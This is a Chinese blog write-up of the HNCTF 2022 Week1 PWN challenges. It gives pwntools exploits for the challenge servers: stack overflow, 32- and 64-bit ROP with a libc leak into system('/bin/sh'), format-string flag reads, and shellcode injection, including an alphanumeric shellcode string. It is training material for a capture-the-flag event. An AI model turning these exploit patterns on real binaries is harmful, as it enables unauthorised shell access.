[HNCTF 2022 Week1] PWN 复现

已于 2023-10-13 18:09:43 修改
阅读量1.5k 收藏 3
点赞数 2
分类专栏: PWN 文章标签: 网络安全
于 2023-08-18 18:42:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/132354382
版权

目录

easync

easyoverflow

ezcmp

ezr0p32

ezr0p64

fmtstrre

ret2shellcode

safe_shellcode

easync

签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下

easyoverflow

简单的栈溢出,直接溢出就行,exp如下:

from pwn import*

p=remote('node3.anna.nssctf.cn',28487)

p.recvuntil('Input something\n')
payload=b'a'*(0x30 +8)

p.sendline(payload)
p.interactive()
ezcmp

分析一下代码,发现buff被加密了,只需绕过这个if语句,就可以执行binsh了,问题是怎么绕过呢?gdb调试来告诉你

 打断点,到enccrypt,通过调试可以发现被加密buff的地址,在观察其内容,就可以解决问题了,exp如下:

from pwn import *

io = remote('node3.anna.nssctf.cn',28776)

payload = p64(0x144678aadc0e4072) + p64(0x84b6e81a4c7eb0e2) + p64(0xf426588abcee2052) + p64(0x0000c8cb2c5e90c2)

io.sendline(payload)
io.interactive()
ezr0p32

首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag

 

 这里也需要注意32位程序和64位程序的传参规则,此题位32位程序,是通过栈传递,所以payload的格式有所不同,system + 垃圾数据 + binsh,这些需要自己去做题总结发现,exp如下:

from pwn import *
p=remote('node3.anna.nssctf.cn',28224)
elf=ELF('./111')

buf=0x804A080
system=0x80483D0
#system=elf.plt['system']

p.recvuntil(b'please tell me your name')
p.sendline(b'/bin/sh\x00')

p.recvuntil(b"now it's your play time~")
payload=b'a'*(0x1c+0x4) +p32(system) +p32(0) +p32(buf)

p.sendline(payload)
p.interactive()
ezr0p64

分析一下代码,可以发现告诉了我们puts的地址,这样就可以求出偏移,自己构造system和binsh,套路比较明显。直接上exp

 至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行

from pwn import *

elf = ELF('./111')
libc = ELF('./libc.so.6')
io = remote('node3.anna.nssctf.cn',28942)

rdi_addr = 0x4012a3
ret_addr = 0x40101a
vuln = elf.sym['vuln']

io.recvuntil(b"0x")
puts_addr = int(io.recv(12),16)

libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base +  next(libc.search(b"/bin/sh\x00"))

payload = b'a'*(0x100 +8) +p64(ret_addr) +p64(rdi_addr) +p64(binsh) +p64(system)

io.sendafter(b"Start your rop.",payload)
io.interactive()
fmtstrre

明显可以看出有格式字符串漏洞

并且发现偏移为6

 gdb调试,同时也需要注意bss段name的地址(存储了flag),0x20 +6=38,从而知道flag的位置

%x 以十六进制打印,只能打印4字节,一般只用于32位

%p 打印目标地址,建议32位和64位都用这个

%s 打印地址内容 %c 打印单个字符

%hhn 写一字节 %hn 写两字节

%n 写四字节

%ln 32位写四字节,64位写八字节

%lln 写八字节

from pwn import*
#p=process('./111')
p=remote('node3.anna.nssctf.cn',28036)
p.recvuntil('Input your format string.\n')

payload='%38$s'
#gdb.attach(p)

p.sendline(payload)
p.interactive()
ret2shellcode

经典的shellcode的题目,只需把shellcode写入bss段

from pwn import *
context(log_level='debug',arch='amd64', os='linux') 

io = remote('node1.anna.nssctf.cn',28928)

payload=asm(shellcraft.sh())
buff=0x4040A0

payload=payload.ljust(0x108,b'A')+p64(buff)

io.sendline(payload)
io.interactive()
safe_shellcode

这道题就难度,不太会,以后会了,再来改下

from pwn import *

io = remote('node2.anna.nssctf.cn',28840)
context(arch = 'amd64', os = 'linux', log_level = 'debug')

shellcode_64="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload=shellcode_64

io.send(payload)
io.interactive()

Xzzzz911
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
pwn1 一道pwn练习题
05-07
pwn练习题
[HNCTF 2022 Week1]Challenge__rce
m0_70819573的博客
04-17 813
由于php变量没有赋值时默认是零,且数组与字符串拼接时返回Array,由此由A自增可以得到全部26位字母通过拼接构造payload.对字符串进行异或操作时,php解析时会将异或结果自动转换为字符串,以其给$_赋值,再通过拼接获取payload。也就是对$a进行取反操作,形成非常规字符绕过限制,在浏览器解析的时候,再还原成原来的payload.而在本题,由于长度限制,所以可以构造参数,再上传参数减少长度。无参RCE,主要方法有三种,取反,自增,异或。这里因为~和^都被过滤了,所以考虑自增。
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 754
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
HNCTF-PWN
最新发布
A13837377363的博客
05-12 702
直接看危险函数,不能溢出,只能覆盖ebp。后面紧接的又是leave,ret很明显是栈迁移,通过printf打印出ebp,通过偏移计算出栈地址。通过gdb调试,偏移是0x38。
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1657
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2157
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
HNCTF wp
GSflyy的博客
11-04 1477
HNCTF的一些收获,以及部分wp
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
ret2libc1pwn 入门题
02-11
pwn 入门题
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
[HNCTF 2022 Week1]超级签到
2303_79610394的博客
11-23 317
[HNCTF 2022 Week1]超级签到
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3278
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
RCE-远程代码执行漏洞
2301_80661529的博客
03-10 995
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
HNCTF 2022 Week1 easyoverflow
2301_79793667的博客
12-19 558
存在危险函数gets,填满数组v4后填充v5,当v5!=0时,自动弹出flag,所以要用变量覆写。、先进行nc连接,发现输入一些东西后会被弹出程序。检查一下附件位数,用相应位数ida打开。首先开启环境,下载附件。
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 707
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSS [HNCTF 2022 Week1]Challenge__rce
Jay17的博客
09-16 552
NSS [HNCTF 2022 Week1]Challenge__rce
[HNCTF 2022] web 刷题记录
rev1ve的博客
09-02 1151
简单分析一下,fsockopen能够使用socket与服务器进行tcp连接,并传输数据,host、port和数据都能定义,存在SSRF。这里应该是从index.php传参,ssrf然后访问到flag.php。F12查看,修改一下maxlength的值为11位。根据提示,传一个我们想要的,那就传flag咯。发现要求我们输入手机号,可是只能输10位。然后是修改cookie为admin,添加。然后随便输入11位,即可得到flag。然后让我们选择要哪个,这里发现。,然后ls看一下目录。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值